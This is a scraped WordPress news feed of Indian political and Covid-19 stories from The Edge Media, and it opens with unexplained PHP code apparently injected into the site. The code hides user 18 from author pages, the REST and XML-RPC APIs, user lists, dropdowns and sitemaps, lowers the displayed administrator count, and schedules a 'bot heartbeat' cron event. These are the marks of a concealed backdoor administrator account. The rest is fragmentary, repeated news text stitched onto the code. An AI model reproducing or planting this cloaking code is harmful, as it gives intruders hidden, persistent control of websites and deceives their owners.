add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post The Supreme Court has given the Centre 24 hours to rule on pending sedition cases under the law appeared first on The Edge Media.
]]>
Meanwhile, the Supreme Court agreed to the Centre’s request to postpone the case until the sedition statute was re-examined. Earlier, the court asked the Centre’s solicitor general, Tushar Mehta, how long it would take to rethink the sedition statute and how the government would deal with its misuse.
The post The Supreme Court has given the Centre 24 hours to rule on pending sedition cases under the law appeared first on The Edge Media.
]]>The post Ordinances are introduced by the Centre to extend the tenure of the ED and CBI directors by up to 5 years appeared first on The Edge Media.
]]>
The Delhi Special Police (Establishment) Ordinance, 2021, and the Central Vigilance Commission (Amendment) Ordinance, 2021, will take effect immediately, according to the Ministry of Law and Justice. The Central Vigilance Commission Act, 2003 will be amended by the Central Vigilance Commission (Amendment) Ordinance, 2021. The Ordinances are being promulgated by the President because Parliament is currently not in session, according to the Ministry.
The post Ordinances are introduced by the Centre to extend the tenure of the ED and CBI directors by up to 5 years appeared first on The Edge Media.
]]>The post As the Supreme Court warns of contempt, the Centre promises a permanent commission for female Army officers appeared first on The Edge Media.
]]>
According to ANI, the Centre also notified the Supreme Court that it would make a judgment on the 11 female Army officers who had petitioned the SC for permanent commission within 10 days. After the Supreme Court warned the Army of contempt, the Centre promises to offer the Permanent Commission option to all eligible female Army officers.
The post As the Supreme Court warns of contempt, the Centre promises a permanent commission for female Army officers appeared first on The Edge Media.
]]>The post BJP: The Maharashtra government should lower the VAT on gasoline and fuel appeared first on The Edge Media.
]]>
Patil told reporters in Kolhapur that they have organized an agitation across Maharashtra to press for the demand, citing the fact that 11 states across the country, some of which are not even run by the BJP, have reduced gasoline VAT to bring relief to the common man.”Malik has confirmed that he bought land from 1993 Mumbai serial bombings criminals,” Patil remarked in response to a question about state minister Nawab Malik, who has hurled many claims against BJP leader Devendra Fadnavis and others.
The post BJP: The Maharashtra government should lower the VAT on gasoline and fuel appeared first on The Edge Media.
]]>The post Telangana Chief Minister KCR warns BJP leaders in the state that he will clip their tongues if they speak loosely appeared first on The Edge Media.
]]>
“I directly visited the Union minister concerned and asked him to take the procured parboiled rice. He said he will make a decision and communicate to me, but till now I have received no response. Telangana state already has around 5 lakh tons of paddy from last year. The Centre is not buying it,” news agency ANI quoted him as saying.
The post Telangana Chief Minister KCR warns BJP leaders in the state that he will clip their tongues if they speak loosely appeared first on The Edge Media.
]]>The post Centre to Send More Forces to J&K Amid Rise in Civilian Killings, Encounters with Terrorists appeared first on The Edge Media.
]]>
They stated that additional CRPF companies will be delivered in stages. Ten businesses will be dispatched to J&K in the first phase, followed by the remaining 15 in the second and third stages.
The post Centre to Send More Forces to J&K Amid Rise in Civilian Killings, Encounters with Terrorists appeared first on The Edge Media.
]]>The post The center sets standards for international newcomers, requiring a negative RT-PCR test appeared first on The Edge Media.
]]>
The existing standards for international arrivals in India have been revised in light of increased vaccine coverage around the world and the changing character of the pandemic, according to a notification from the ministry of health and family welfare.
Due to the coronavirus infections (Covid-19) pandemic, international planned commercial flights to India have been halted till October 31. International cargo flights and those certified by the regulator on specified routes were allowed to fly, according to the Directorate General of Civil Aviation.
The post The center sets standards for international newcomers, requiring a negative RT-PCR test appeared first on The Edge Media.
]]>The post Centre issues guidelines to help people identify authentic vaccines appeared first on The Edge Media.
]]>According to the Union ministry of health and family welfare, 684.6 million vaccine doses against Covid-19 have been administered so far in the country. “With the administration of 71,61,760 vaccine doses in the last 24 hours, India’s COVID-19 vaccination coverage has surpassed the cumulative figure of 68.46 Crore (68,46,69,521) on Sunday,” the health ministry said.
Here are the various parameters to identify if a Covid-19 vaccine is original:
How to check whether the Covishield vaccine is original?
* The SII product’s label shade is dark green and the colour of the aluminium flip-off seal is dark green.
*The brand name with the trademark is mentioned on the original vaccine.
*The lettering is printed in special white ink to be more clear and readable.
* The text font of the Generic name is in un-bold
* Overprinted with “CGS NOT FOR SALE”.
* The SII logo is printed at a unique angle and position which can be identified by only a select few who are aware of the exact details.
* The lettering is printed in special white ink to be more clear and readable.
* The entire label has been given a special honeycomb effect, which is visible only at a specific angle.
*The honeycomb design has been altered slightly at strategic locations and certain additional special elements added to the texture design. They are not visible to people in general but those who know about the subtle changes can easily check and verify the authenticity of the label and vial.
How to check Covaxin’s authenticity?
* There is an invisible UV helix or a DNA-like structure on the Covaxin label. It is only visible under UV light
* The micro text hidden in the label claims Dots, which is written as Covaxin
* There is a green foil effect in X of Covaxin.
* There is a holographic effect on Covaxin
How to find out if Sputnik V vaccine is not fake?
* There are different labels for the two bulk manufacturing sites where the Russian Covid-19 vaccine is produced. All other information and design are the same except the manufacturer’s name.
* The English label is available only on the front and back of the carton of 5 ampoule pack for all the imported products so far. All other sides, including the primary label on the vaccine ampoule, is in Russian script.
(With agency inputs)
The post Centre issues guidelines to help people identify authentic vaccines appeared first on The Edge Media.
]]>The post SII Informed the Centre that 20 Crore Covishield Doses Will Be Delivered in September appeared first on The Edge Media.
]]>The SII placed its manufacturing capacity for Covishield for August and September at 10 crores apiece in a production plan submitted to the national government in May. The world’s largest vaccine maker has delivered 12 crore vaccination doses to the government and private hospitals.
The post SII Informed the Centre that 20 Crore Covishield Doses Will Be Delivered in September appeared first on The Edge Media.
]]>The post Airports Among $81 Billion Of Infrastructure To Be Sold By Centre: Report appeared first on The Edge Media.
]]>The post Airports Among $81 Billion Of Infrastructure To Be Sold By Centre: Report appeared first on The Edge Media.
]]>